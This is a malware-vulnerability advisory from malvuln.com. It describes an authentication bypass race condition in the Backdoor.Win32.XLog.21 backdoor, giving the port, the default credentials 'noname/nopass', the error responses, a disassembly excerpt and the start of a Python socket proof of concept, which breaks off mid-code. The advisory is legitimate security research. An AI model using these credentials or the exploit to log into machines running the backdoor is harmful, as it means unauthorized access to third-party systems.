Authored by malvuln | Site malvuln.com

Backdoor.Win32.XLog.21 malware suffers from an authentication bypass vulnerability due to a race condition.

Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/2906b5dc5132dd1319827415e837168f.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.XLog.21
Vulnerability: Authentication Bypass Race Condition
Description: The malware listens on TCP port 5553. Third-party attackers who can reach the system before a password has been set can logon using default credentials of noname/nopass and run commands made avail by the backdoor including changing the password therby potentially locking out the original intruder.

Incorrect username "victim|pass" we get
Received invalid name parameter!

Incorrect password "noname|pass" we get
Received incorrect password from client!

Sending correct noname|nopass creds we get no error. Next, we must send valid cmds using correct pipe delimiter or we will get "Received invalid parameter" errors.

push offset aCmdChangepass ; "cmd changepass"
004018EA mov edx, [ebp+Str1]
004018ED push edx ; Str1
004018EE call _strcmp
004018F3 add esp, 8
004018F6 test eax, eax
004018F8 jnz loc_4019A6
004018FE lea eax, [ebp+Delimiter]
00401901 push eax ; Delimiter
00401902 push 0 ; String
00401904 call _strtok
00401909 add esp, 8
0040190C mov [ebp+Str1], eax
0040190F cmp [ebp+Str1], 0
00401913 jnz short loc_401930
00401915 push offset aReceivedInvali_4 ; "rnReceived invalid parameter (NULL) f"...
0040191A mov ecx, [ebp+s]
0040191D push ecx ; s
0040191E call sub_4019D9

Family: XLog
Type: PE32
MD5: 2906b5dc5132dd1319827415e837168f
Vuln ID: MVID-2022-0543
Disclosure: 04/06/2022


Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=5553

def chk_res(s):
res=""
while True:
res += s.recv(512)
break
if "